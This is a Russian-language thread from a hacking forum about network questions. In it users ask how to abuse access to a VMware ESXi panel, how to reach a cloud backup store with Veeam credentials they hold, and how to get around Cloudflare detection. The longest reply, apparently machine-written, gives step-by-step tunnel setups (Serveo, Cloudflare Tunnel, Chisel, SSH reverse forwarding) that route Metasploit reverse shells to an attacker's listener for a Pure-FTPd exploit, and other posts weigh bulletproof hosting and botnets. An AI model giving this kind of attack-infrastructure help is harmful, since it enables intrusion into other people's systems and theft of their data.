• XSS.stack #1 – первый литературный журнал от юзеров форума

[net-hacking] Вопросы по сетям

Пожалуйста, обратите внимание, что пользователь заблокирован
ЕСТЬ доступ к vmware esxi по вебу. что можно интересного придумать? Доступ к виртуалкам тоже есть.
 
Здравствуйте!

У меня следующая конфигурация:

  • Основная машина: Windows 10, подключение к интернету через VPN.
  • Виртуализация: В Windows 10 установлен VirtualBox, в котором работает Kali Linux.
  • Сеть: Kali Linux подключена к интернету через NAT в VirtualBox. Этот NAT использует подключение через VPN на основной машине (Windows 10).
  • Цель: Нужно настроить Metasploit в Kali Linux, чтобы он мог прослушивать порт (например, 4444) и принимать входящие соединения из внешнего мира.

  • Вопрос:
    1. Как правильно настроить проброс портов в VirtualBox для NAT-соединения, чтобы Metasploit мог принимать внешние подключения?
    2. Нужно ли настраивать проброс порта на роутере, если подключение идет через VPN?
    3. Какой порядок действий, чтобы Metasploit в Kali Linux, работающем за NAT и через VPN, смог прослушивать порт и принимать соединения из внешней сети? А так же наверное надо настроить еще VPN для открытия этого порта?(VPN идет через vps)
 
Здравствуйте!

У меня следующая конфигурация:

  • Основная машина: Windows 10, подключение к интернету через VPN.
  • Виртуализация: В Windows 10 установлен VirtualBox, в котором работает Kali Linux.
  • Сеть: Kali Linux подключена к интернету через NAT в VirtualBox. Этот NAT использует подключение через VPN на основной машине (Windows 10).
  • Цель: Нужно настроить Metasploit в Kali Linux, чтобы он мог прослушивать порт (например, 4444) и принимать входящие соединения из внешнего мира.

  • Вопрос:
    1. Как правильно настроить проброс портов в VirtualBox для NAT-соединения, чтобы Metasploit мог принимать внешние подключения?
    2. Нужно ли настраивать проброс порта на роутере, если подключение идет через VPN?
    3. Какой порядок действий, чтобы Metasploit в Kali Linux, работающем за NAT и через VPN, смог прослушивать порт и принимать соединения из внешней сети? А так же наверное надо настроить еще VPN для открытия этого порта?(VPN идет через vps)
Советую просто взять сервер
 
гугли что такое ngrok и как им пользоваться, сейчас туда вроде как обязательно сс подвязывать, но если поймешь как это работает, быстро нагуглишь альтернативы
наверное что то из этого:

В вашем случае ситуация достаточно специфична, так как вы работаете с Kali Linux в VirtualBox под NAT, а основной хост (Windows) использует VPN. Это создает несколько уровней сетевых ограничений:

1. NAT в VirtualBox: Kali Linux находится за виртуальным роутером VirtualBox, и её локальный IP недоступен извне.
2. VPN на основном хосте: Трафик через VPN может блокировать или перенаправлять входящие соединения.
3. Необходимость проброса порта: Для работы с Metasploit вам нужно, чтобы целевая система могла отправить reverse shell на публичный адрес.

Для такой конфигурации лучше всего подходят инструменты, которые могут создавать туннели через интернет, минуя ограничения NAT и VPN. Вот оптимальные варианты:

---

### 1. Serveo
Serveo — это простой SSH-сервис, который позволяет пробрасывать порты без установки дополнительного ПО. Он идеально подходит для вашей ситуации, так как не требует сложной настройки и работает через SSH.

#### Почему Serveo подходит:
  • Работает через SSH, что минует ограничения NAT и VPN.
  • Предоставляет публичный URL (например, https://abcdef.serveo.net), который можно использовать в Metasploit.
  • Не требует открытия портов на роутере или настройки проброса портов в VirtualBox.

#### Настройка:
1. В Kali Linux выполните команду:
Код:
bash
   ssh -R 80:localhost:4444 serveo.net

2. Serveo предоставит публичный URL, например:
Код:
   Forwarding HTTP traffic from https://abcdef.serveo.net

3. Настройте Metasploit:
Код:
bash
   set LHOST abcdef.serveo.net
   set LPORT 80

4. Запустите эксплойт Pure-FTPd:
Код:
bash
   exploit

#### Преимущества:
  • Простота использования.
  • Не требует дополнительных настроек NAT или VPN.

---

### 2. Cloudflare Tunnel
Cloudflare Tunnel — это безопасный способ подключить вашу локальную машину к интернету через Cloudflare. Это отличный выбор, если вы хотите избежать проблем с NAT и VPN.

#### Почему Cloudflare Tunnel подходит:
  • Не требует открытия портов на роутере.
  • Трафик проходит через Cloudflare, что обходит ограничения VPN.
  • Предоставляет публичный домен (например, https://abcdef.cfargotunnel.com).

#### Настройка:
1. Установите cloudflared в Kali Linux:
Код:
bash
   sudo apt update
   sudo apt install cloudflared

2. Авторизуйтесь в Cloudflare:
Код:
bash
   cloudflared tunnel login

3. Создайте туннель:
Код:
bash
   cloudflared tunnel create my-tunnel

4. Запустите туннель:
Код:
bash
   cloudflared tunnel run my-tunnel

5. Используйте предоставленный URL в Metasploit:
Код:
bash
   set LHOST <ваш_домен>.cfargotunnel.com
   set LPORT 4444

#### Преимущества:
  • Безопасность благодаря Cloudflare.
  • Надёжная работа даже при использовании VPN.

---

### 3. Chisel
Chisel — это мощный инструмент для создания туннелей через HTTP/WebSocket. Он может работать через прокси и файрволы, что делает его подходящим для работы с NAT и VPN.

#### Почему Chisel подходит:
  • Поддерживает TCP-трафик, необходимый для reverse shell.
  • Работает через прокси и файрволы, минуя ограничения NAT и VPN.
  • Легко настраивается.

#### Настройка:
1. Установите Chisel в Kali Linux:
Код:
bash
   sudo apt install chisel

2. На внешнем сервере (например, VPS) запустите Chisel в режиме сервера:
Код:
bash
   chisel server --port 8080 --reverse

3. На Kali Linux создайте туннель:
Код:
bash
   chisel client http://<публичный_IP_сервера>:8080 R:4444:localhost:4444

4. Используйте публичный IP сервера в Metasploit:
Код:
bash
   set LHOST <публичный_IP_сервера>
   set LPORT 4444

#### Преимущества:
  • Гибкость настройки.
  • Работает через прокси и файрволы.

---

### 4. SSH Reverse Tunnel через внешний сервер (VPS)
Если у вас есть доступ к внешнему серверу (например, VPS), вы можете создать SSH-туннель вручную. Это классический способ решения проблемы с NAT и VPN.

#### Почему SSH Reverse Tunnel подходит:
  • Минует ограничения NAT и VPN.
  • Полный контроль над трафиком.

#### Настройка:
1. На Kali Linux выполните команду:
Код:
bash
   ssh -R 4444:localhost:4444 user@<публичный_IP_VPS>

2. Настройте брандмауэр на VPS, чтобы разрешить входящие подключения на порт 4444.

3. Используйте публичный IP VPS в Metasploit:
Код:
bash
   set LHOST <публичный_IP_VPS>
   set LPORT 4444

#### Преимущества:
  • Простота настройки.
  • Надёжная работа.

---

### 5. Итог
Для вашей ситуации наиболее подходящими вариантами являются:
1. Serveo: Простой и удобный для быстрого проброса портов.
2. Cloudflare Tunnel: Безопасный и надёжный для долгосрочного использования.
3. Chisel: Мощный инструмент для продвинутых задач.
4. SSH Reverse Tunnel: Если у вас есть доступ к VPS.

Рекомендация: начните с Serveo, так как он самый простой в настройке и отлично подходит для тестирования. Если потребуется более надёжное решение, переходите на Cloudflare Tunnel или Chisel.
 
Здравствуйте!

У меня следующая конфигурация:

  • Основная машина: Windows 10, подключение к интернету через VPN.
  • Виртуализация: В Windows 10 установлен VirtualBox, в котором работает Kali Linux.
  • Сеть: Kali Linux подключена к интернету через NAT в VirtualBox. Этот NAT использует подключение через VPN на основной машине (Windows 10).
  • Цель: Нужно настроить Metasploit в Kali Linux, чтобы он мог прослушивать порт (например, 4444) и принимать входящие соединения из внешнего мира.

  • Вопрос:
    1. Как правильно настроить проброс портов в VirtualBox для NAT-соединения, чтобы Metasploit мог принимать внешние подключения?
    2. Нужно ли настраивать проброс порта на роутере, если подключение идет через VPN?
    3. Какой порядок действий, чтобы Metasploit в Kali Linux, работающем за NAT и через VPN, смог прослушивать порт и принимать соединения из внешней сети? А так же наверное надо настроить еще VPN для открытия этого порта?(VPN идет через vps)
Я бы предложил оплатить сервак и пробрасывать на него, а на нём поставить переадресацию на твоё подключение по впн, к примеру. Либо оплатить подписку ngrok, тогда всё проще будет, по цене примерно 20 баксов, если не ошибаюсь.
 
Я бы предложил оплатить сервак и пробрасывать на него, а на нём поставить переадресацию на твоё подключение по впн, к примеру. Либо оплатить подписку ngrok, тогда всё проще будет, по цене примерно 20 баксов, если не ошибаюсь.
наверное так лучше, только у этих vps тоже наверное проблемы с портами, это нужно абузоустойчивый сервер ?
 
Последнее редактирование:
Здравствуйте, хотел отследить запросы нужного мне сайта. Делаю это через HTTP Toolkit, поставил локальный прокси в настройки сети виндовс, чтобы весь трафик отслеживался. Захожу на сайт, а клоудфлейр мне просто бесконечную капчу дает, непонятно, как, ведь прокси обычный localhost:8000
Может, кто подсказать, что делать в такой ситуации?

проблему кстати заметил только на одном сайте который мне нужен
 
Здравствуйте, хотел отследить запросы нужного мне сайта. Делаю это через HTTP Toolkit, поставил локальный прокси в настройки сети виндовс, чтобы весь трафик отслеживался. Захожу на сайт, а клоудфлейр мне просто бесконечную капчу дает, непонятно, как, ведь прокси обычный localhost:8000
Может, кто подсказать, что делать в такой ситуации?

проблему кстати заметил только на одном сайте который мне нужен
cloudflare детектит мельчайшие отклонения tls, на сайте скорее всего включен анти-ддос режим и все подозрительные коннекты блокируются
Используй burp suite
 
cloudflare детектит мельчайшие отклонения tls, на сайте скорее всего включен анти-ддос режим и все подозрительные коннекты блокируются
Используй burp suite
а без бурпа можно как то?
 
наверное так лучше, только у этих vps тоже наверное проблемы с портами, это нужно абузоустойчивый сервер ?
Ну по-хорошему да, но если вы какой-то страшной суеты не наводите, то может и прокатит без блокировки. Условно, если маленькое количество коннектов, то спокойно, если ботнет, то вообще не спокойно.
 
ну вот вообще такой вопрос



ecли установить LPORT 5555 (просто пример) в metasploit, в linux (которая в virtual box, через NAT, в iptable порт открыл, в NAT сделал проброс порта 5555) , через windows +vpn(vpn ставил через vps) и все это через домашний роутер (например D-LInk) - порт не будет принимать входящий трафик?

Так ? :



  1. Настроить проброс порта на VPS (через который работает VPN).
  2. Настроить проброс порта на Windows (чтобы трафик доходил до Linux).
  3. Изменить сетевую конфигурацию Linux (чтобы она могла принимать трафик).
 
Последнее редактирование:
Всем привет, Вопрос по Veeam.
В моей сети к Veeam подключены Cloud бэкап репозитории на удаленном сервере в сети Интеренет.
У меня есть креды из вима и ip сервера.

Как получить доступ к хранилищу с бекапами? ПУТЬ IP\ozt login: ozt Pass: в наличии

Открыть в браузере, проводнике, файл зиллой - не получается. Я так понимаю это S3 хранилище, но где взять сикрет фразу? Или я не в том направлении мыслю...
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх